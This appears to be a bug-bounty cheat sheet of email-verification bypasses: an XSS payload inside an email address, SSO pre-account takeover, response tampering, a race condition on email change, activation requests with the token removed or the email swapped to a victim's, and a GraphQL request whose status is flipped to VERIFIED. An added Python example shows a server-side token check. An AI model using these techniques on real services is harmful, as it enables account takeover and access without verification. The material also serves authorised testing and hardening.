Email Verification Bypass
"><svg/onload=confirm(1)>"@x.y
No email verification + SSO = Pre Account Takeover
First, manually create an account using the target's email address.
Later, if the target creates an account or logs in using SSO, they will be linked to the same account.
You will be able to access the target account via the credentials you set up earlier.
Alter response
Register an account, log in with this account, and intercept the successful login response
Register a victim account - it will prompt for a 2FA code, but we don't have access to that email
Go back to log in with the email
Capture the login request - alter the response to the success response
Race Condition

Intercept the change email request and send it to Repeater
The request needs to be sent at least 2 times, so send it to Repeater again
Repeater 1
Repeater 2
Create a group to be able to send the two requests at the same time
Send group in parallel
Remove the Token
Modify the email parameter from attacker@gmail.com to a different email address (for this example, victim@gmail.com)
https://app.example.me/signup/activation?token=c6dc625e-5b5a-4627-b39c-98e0dfcbc22f&source=trial&email=victim@gmail.com&chkNR=false
Intercept the request
{
"firstName": "Attacker",
"lastName": "Smith",
"email": "victim@gmail.com",
"password": "strongpassword123",
"token": "c6dc625e-5b5a-4627-b39c-98e0dfcbc22f"
}
Remove the token
{
"firstName": "Attacker",
"lastName": "Smith",
"email": "victim@gmail.com",
"password": "strongpassword123"
}
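A server-side check that rejects both request bodies above (the edited email parameter and the removed token), as an added example that is not from the original page. The in-memory store and the names `issue_token` and `activate` are assumptions for illustration.

```python
import hashlib
import secrets

# Hypothetical in-memory store: sha256(token) -> email the token was issued for.
# Only the digest is kept, so a leaked store does not reveal usable tokens.
_PENDING: dict[str, str] = {}

def _digest(token: str) -> str:
    return hashlib.sha256(token.encode()).hexdigest()

def issue_token(email: str) -> str:
    """Create a single-use activation token bound to exactly one email."""
    token = secrets.token_urlsafe(32)
    _PENDING[_digest(token)] = email.strip().lower()
    return token

def activate(body: dict) -> tuple[bool, str]:
    """Validate an activation body; the email it carries is never trusted alone."""
    token, email = body.get("token"), body.get("email")
    if not isinstance(token, str) or not token:
        return False, "token required"            # body with the token removed
    if not isinstance(email, str):
        return False, "email required"
    bound = _PENDING.get(_digest(token))
    if bound is None:
        return False, "unknown or used token"
    if bound != email.strip().lower():
        return False, "email does not match token"  # edited email parameter
    del _PENDING[_digest(token)]                  # single use
    return True, bound                            # activate the bound address only
```

In a real service the lookup and delete would be one database transaction so that parallel requests cannot both consume the token.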
GraphQL Request
[{"operationName":"solutionsResendEmailVerification","variables":{"input":{"entityId":"511","status":"PENDING","requestReferrer":"SOLUTIONS_CREATE"}},"query":"mutation solutionsResendEmailVerification($input: ResendEmailInput!) {\n resendEmailVerification(input: $input) {\n success\n __typename\n }\n}\n"}]
Change the status value from "PENDING" to "VERIFIED", refresh the page, and gain access to the solutions without verifying the address